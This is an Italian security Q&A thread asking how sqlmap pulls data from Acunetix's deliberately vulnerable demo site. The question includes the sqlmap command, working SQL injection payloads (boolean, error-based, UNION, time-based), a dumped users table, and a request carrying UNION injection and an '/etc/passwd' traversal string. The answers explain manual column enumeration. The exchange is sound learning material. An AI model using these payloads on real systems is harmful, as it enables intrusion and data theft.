Come funziona sqlmap per ottenere tutte le informazioni del database

1

Sono curioso di sapere come sqlmap sia in grado di ottenere tutte le informazioni dal database? Sto usando burp come proxy per visualizzare tutte le richieste e le risposte. Dalla risposta non sono riuscito a vedere alcuna informazione relativa al database ma la sqlmap in grado di mostrare le informazioni correlate. Ad esempio se uso sqlmap -u link -D acuart -T utenti --dump --proxy="http://192.168.0.115:8181", sono in grado di ottenere i record dal db acuart negli utenti della tabella.

Questo è l'output di sqlmap

[*] starting at 17:55:43

[17:55:43] [INFO] resuming back-end DBMS 'mysql' 
[17:55:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7494=7494

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 4839 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (CASE WHEN (4839=4839) THEN 1 ELSE 0 END)),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x616b7441734e6d755964,0x716a717871),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cat=1 AND (SELECT * FROM (SELECT(SLEEP(15)))Swtz)
---
[17:55:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[17:55:49] [INFO] fetching columns for table 'users' in database 'acuart'
[17:55:49] [INFO] fetching entries for table 'users' in database 'acuart'
[17:55:49] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart | pass | uname | phone   | email           | address   |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 0    | test | test  | 2323345 | [email protected] | 21 street |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+

[17:55:49] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[17:55:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 17:55:49

Richiesta dal proxy:

GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache,no-store

Risposta dal proxy:

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sun, 03 May 2015 13:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Content-Length: 7011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="http://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
  <div id="globalNav"> 
        <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
    <td align="left">
        <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
        </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
        <a href="guestbook.php">guestbook</a> | 
        <a href="AJAX/index.php">AJAX Demo</a>
    </td>
    <td align="right">
        </td>
    </tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
    <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin.
</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <input name="searchFor" type="text" size="10"> 
      <input name="goButton" type="submit" value="go"> 
    </form> 
  </div> 
  <div id="sectionLinks"> 
    <ul> 
      <li><a href="categories.php">Browse categories</a></li> 
      <li><a href="artists.php">Browse artists</a></li> 
      <li><a href="cart.php">Your cart</a></li> 
      <li><a href="login.php">Signup</a></li>
      <li><a href="userinfo.php">Your profile</a></li>
      <li><a href="guestbook.php">Our guestbook</a></li>
        <li><a href="AJAX/index.php">AJAX Demo</a></li>
      </li> 
    </ul> 
  </div> 
  <div class="relatedLinks"> 
    <h3>Links</h3> 
    <ul> 
      <li><a href="http://www.acunetix.com">Security art</a></li> 
      <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> 
    </ul> 
  </div> 
  <div id="advert"> 
    <p>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">
        <param name="movie" value="Flash/add.swf">
        <param name=quality value=high>
        <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>
      </object>
    </p>
  </div> 
</div> 

<!--end navbar --> 
<div id="siteInfo">  <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> | &copy;2006
  Acunetix Ltd 
</div> 
<br> 
</div>
</body>
<!-- InstanceEnd --></html>

La tua spiegazione è molto apprezzata. Grazie.

    
posta overshadow 03.05.2015 - 09:54
fonte

2 risposte

3

Sembra che ci sia qualcosa di sbagliato nella richiesta che hai postato. Poiché il parametro vulnerabile è il parametro "cat", "&" nella tua richiesta separa il carico utile dal parametro vulnerabile e quindi non vengono rivelate informazioni.

Facciamolo bene:

Una richiesta di:

link

rivela un messaggio di errore che indica che il numero di colonne è diverso dal numero nella query originale.

Error: The used SELECT statements have a different number of columns

Aumentando il numero di colonne (aggiungendo numeri separati da virgola) fino a quando il messaggio scompare, determiniamo che il numero di colonne deve essere 11.

Questo perché la richiesta per quanto segue si tradurrà in una pagina valida:

link

Vediamo che un numero di elementi è stato aggiunto alla nostra pagina. I numeri 7, 2 e 9 sono facilmente visibili in ciascuno degli articoli. Se sostituiamo uno di essi con le informazioni che vogliamo ricevere (nome_tabella da information_schema.tables) otteniamo le informazioni che stavi cercando:

link

(La tabella utenti è nell'ultimo elemento)

Gli stessi punti possono essere utilizzati per estrarre tutte le altre informazioni che stai cercando. Basta modificare la colonna che si desidera ricevere e la tabella in cui si trovano i dati.

    
risposta data 04.05.2015 - 09:17
fonte
1

Questa discussione è abbastanza vecchia, ma per tutti coloro che vogliono sapere come funziona sqlmap, usa -v6 (livello di verosimiglianza 6) mentre esegui il comando sqlmap.

    
risposta data 13.11.2016 - 09:05
fonte

Leggi altre domande sui tag